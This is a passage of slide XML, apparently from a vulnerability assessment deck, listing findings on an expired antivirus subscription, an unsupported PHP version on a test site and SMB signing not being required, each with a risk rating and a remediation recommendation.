                      <a:srgbClr val="F8CFB6"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="650250">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>LOW</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="92D050"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>0</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450">
                    <a:solidFill>
                      <a:srgbClr val="FFF2CC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="694" name="Google Shape;694;p86"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6024880" y="1188720"/>
          <a:ext cx="6045200" cy="5425440"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
            <c:chart r:id="rId3"/>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="695" name="Google Shape;695;p86"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="656244" y="544945"/>
            <a:ext cx="889415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Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>STATISTICAL DETAILS OF VULNERABILITIES</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pic>
        <p:nvPicPr>
          <p:cNvPr id="700" name="Google Shape;700;p87"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="12191999" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="701" name="Google Shape;701;p87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5499677" y="3819759"/>
            <a:ext cx="6316473" cy="212365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chemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>DETAILED DESCRIPTION </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>OF </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t>OBSERVATIONS</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88"/>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rPr lang="en-US"/>
              <a:t>1. Lack of proper antivirus solution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="707" name="Google Shape;707;p88"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="274320" y="1435608"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11663675"/>
              </a:tblGrid>
              <a:tr h="394450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1040525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>During the security review, it was observed that there is one antivirus solution “K7 Total Security”, which is expired.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:t/>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>K7 Total Security is not working as the subscription period has expired.</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16225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                          </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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1087825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>If the host machine gets infected by malware or virus, it will not get detected.</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06750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1352700">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800"/>
                        <a:t>We recommend to buy a new subscription for the anti virus.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708" name="Google Shape;708;p88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7567675" y="3018800"/>
            <a:ext cx="502800" cy="434400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0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709" name="Google Shape;709;p88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9395265" y="3018825"/>
            <a:ext cx="502800" cy="434400"/>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710" name="Google Shape;710;p88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11096676" y="3018825"/>
            <a:ext cx="570600" cy="434400"/>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89"/>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rPr lang="en-US"/>
              <a:t>Lack of proper antivirus solution</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="716" name="Google Shape;716;p89"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="815340" y="1809952"/>
            <a:ext cx="10151110" cy="4461308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="717" name="Google Shape;717;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815340" y="1371600"/>
            <a:ext cx="544068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OUTPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a: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9"/>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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>PHP Unsupported Version Detection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Google Shape;118;p9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="521207" y="1300480"/>
            <a:ext cx="10363200" cy="3637280"/>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4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Google Shape;119;p9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="90100"/>
            <a:ext cx="65" cy="276999"/>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chemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Google Shape;120;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="741680" y="1605280"/>
            <a:ext cx="8554720" cy="25545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333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>PHP VERSION USED IS EXPIRED AND REQUIRES TO BE UPDATED.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Source : http://testphp.vulnweb.com/secured/phpinfo.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Installed version : 5.1.6 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>End of support date : 2006/08/24 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Announcement : http://php.net/eol.php </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Supported versions : 7.3.x / 7.4.x / 8.0.x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
              <a:t> </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90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617473" y="912876"/>
            <a:ext cx="10977373" cy="640080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="45700" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="45700">
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>SMB Signing not required</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="723" name="Google Shape;723;p90"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="274320" y="1435608"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11663675"/>
              </a:tblGrid>
              <a:tr h="394450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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1040525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>Signing is not required on the remote SMB server. </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16225">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>                               HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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1087825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>An unauthenticated, remote attacker can exploit this to conduct man-in-the-middle attacks against the SMB server.</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06750">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1352700">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>We recommend to enforce message signing in the host's configuration. On Windows, this is found in the policy setting 'Microsoft network server: Digitally sign communications (always)'. On Samba, the setting is called 'server signing'. See the 'see also' links for further details.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1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724" name="Google Shape;724;p90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7279640" y="2865120"/>
            <a:ext cx="533400" cy="40386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725" name="Google Shape;725;p90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9258300" y="2865120"/>
            <a:ext cx="533400" cy="403860"/>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726" name="Google Shape;726;p90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10965180" y="2865120"/>
